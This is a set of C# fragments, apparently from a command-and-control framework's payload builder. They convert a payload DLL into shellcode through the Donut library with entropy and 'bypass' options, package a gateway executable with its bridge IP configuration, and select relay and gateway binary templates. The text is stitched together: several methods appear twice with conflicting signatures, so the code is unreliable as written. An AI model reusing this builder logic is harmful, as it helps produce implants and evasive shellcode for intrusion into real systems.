public byte[] GenerateShellcode(byte[] payload, DonutRequest request, Build.Architecture arch)
{
// donut api requires files
var rand = new Random();
var tmpFilename = rand.NextString(16);
var tmpPayloadFile = Path.Combine(m_TempPath, tmpFilename + ".dll");
var tmpDonutFile = Path.Combine(m_TempPath, tmpFilename + ".donut");
WriteToFile(payload, tmpPayloadFile);
var config = new DonutLibrary.DonutConfig
{
arch = (int)(arch == Build.Architecture.X64 ? DonutLibrary.Architecture.X64 : DonutLibrary.Architecture.X86),
mod_type = (int)(DonutLibrary.ModuleType.DLL),
format = (int)request.format,
compress = (int)request.compress,
entropy = (int)request.entropy,
inst_type = (int)DonutLibrary.InstanceType.PIC,
input = tmpPayloadFile,
output = tmpDonutFile,
bypass = (int)request.bypass,
inst_len = 0
};
try
{
DonutLibrary.GenerateShellcode(config);
return(File.ReadAllBytes(tmpDonutFile));
}
finally
{
CleanupFile(tmpPayloadFile);
CleanupFile(tmpDonutFile);
}
}
public IActionResult GetGatewayExeArchitecture(Build.Architecture architecture, string name, [FromServices] ICustomizer customizer, [FromServices] GatewaysSyncService gss)
{
using (var ms = new MemoryStream())
{
var rand = new Random();
var agentId = new HexId(rand.NextU64()).ToString();
var nameOrAgentId = name ?? agentId;
using (var zipArchive = new ZipArchive(ms, ZipArchiveMode.Create))
{
var gatewayEntry = zipArchive.CreateEntry($"Gateway{architecture}_{nameOrAgentId}.exe");
using (var bw = new BinaryWriter(gatewayEntry.Open()))
{
bw.Write(customizer.GetGateway(architecture));
}
var configEntry = zipArchive.CreateEntry("GatewayConfiguration.json");
var config = new JObject()
{
["BuildId"] = new HexId(rand.NextU16()).ToString(),
["AgentId"] = agentId,
["Name"] = nameOrAgentId,
["API Bridge IP"] = gss.conf.apiBridge.ipAddress.ToString(),
["API Bridge port"] = gss.conf.apiBridge.port,
};
using (var w = new StreamWriter(configEntry.Open()))
{
w.Write(config.ToString());
}
}
return(File(ms.ToArray(), "application/zip", $"Gateway_{nameOrAgentId}.zip"));
}
}
private static string GetBinaryDescription(Build.Architecture arch, bool debug = false)
{
var config = debug ? "d" : "r";
var ar = arch == Build.Architecture.X64 ? "64" : "86";
return($"{config}{ar}");
}
private string GetBinaryDescription(Build.Architecture arch)
{
string config;
if (this.UseDebugBinaries)
{
config = "d";
}
else if (this.UseRWDIBinaries)
{
config = "rwdi";
}
else
{
config = "r";
}
var ar = arch == Build.Architecture.X64 ? "64" : "86";
return($"{config}{ar}");
}
public byte[] GetGateway(Build.Architecture arch)
{
var c3FileName = Path.Combine(PayloadTemplateDir, GetGatewayFileName(arch));
return(File.ReadAllBytes(c3FileName));
}
private string GetGatewayFileName(Build.Architecture arch) => String.Format(gatewayFile, GetBinaryDescription(arch));
private string GetRelayFileName(Build.BinaryType binaryType, Build.Architecture arch) => String.Format(payloadTemplateFiles[binaryType], GetBinaryDescription(arch));
public NewBuild(RelayBuild relayBuild)
{
BuildId = relayBuild.BuildId;
Command = relayBuild.StartupCommands[0].ToObject <Command>().Data;
Arch = relayBuild.Arch;
}
private static string GetGatewayFileName(Build.Architecture arch, bool debug = false) => String.Format(gatewayFile, GetBinaryDescription(arch, debug));
private static string GetRelayFileName(Build.BinaryType binaryType, Build.Architecture arch, bool debug = false) => String.Format(payloadTemplateFiles[binaryType], GetBinaryDescription(arch, debug));
